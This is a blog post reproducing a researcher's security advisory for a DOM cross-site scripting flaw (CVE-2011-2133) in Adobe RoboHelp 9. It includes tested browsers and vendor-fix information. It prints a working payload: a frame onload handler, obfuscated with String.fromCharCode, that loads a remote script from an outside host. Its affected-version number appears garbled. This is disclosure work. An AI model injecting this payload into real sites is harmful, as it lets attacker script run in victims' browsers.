Back in May while doing an application intrusion testing, I have found an interesting DOM Cross Site Scripting in a part of the application which was generated with Adobe RoboHelp software. At the begin, I thought I have found a bug which was already discovered and a Google search seemed to confirm my doubt, as I couldn't find out what Adobe RoboHelp version was used. However, all the bug entries I could find looked different and some of them were lacking an accurate description, payloads and examples.
It is worth to say that at that time I also a got a preview of the DOMinator tool developed by Stefano Di Paola and wanted to test it and see if it would find the same bug. By browsing the site with DOMinator, in a matter of few seconds I could see the red alert showing up and highlighting the same vulnerable point. It is definitely a tool to try when looking for DOM XSS bugs.
Name: Adobe RoboHelp 9.0 – DOM Cross Site Scripting
Vendor: Website http://www.adobe.com
Date Released: August 11th, 2011 – CVE-2011-2133
Affected Software: versions 126.96.36.199 and earlier
Researcher: Roberto Suggi Liverani
Original Security Advisory (PDF): http://www.security-assessment.com/files/documents/advisory/Adobe_RoboHelp_9_-_DOM_XSS.pdf
Injection in the DOM:
Rendered in DOM:
<frame scrolling="auto" name="bsscright" title="Topic" border="1" frameborder="1" id="topic" onload="a=document.createElement('script');a.setAttribute('src',String.fromCharCode(104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115));document.body.appendChild(a);" src=""></frame>
The above attack has been successfully reproduced with the following browser/OS:
- Firefox 3.5.16 – Windows XP SP3
- Google Chrome 11.0.696.69 – Windows XP SP3
- IE 8.0.6001.18702 – Windows XP SP3
- Opera 11.10 – build 2092 – Windows XP SP3
Adobe validated this security issue and updated the Adobe RoboHelp software to address this issue.
The fix is incorporated in the updates which can be found at the following URL:
Security-Assessment.com recommends applying the updates provided by the vendor.
- permalink -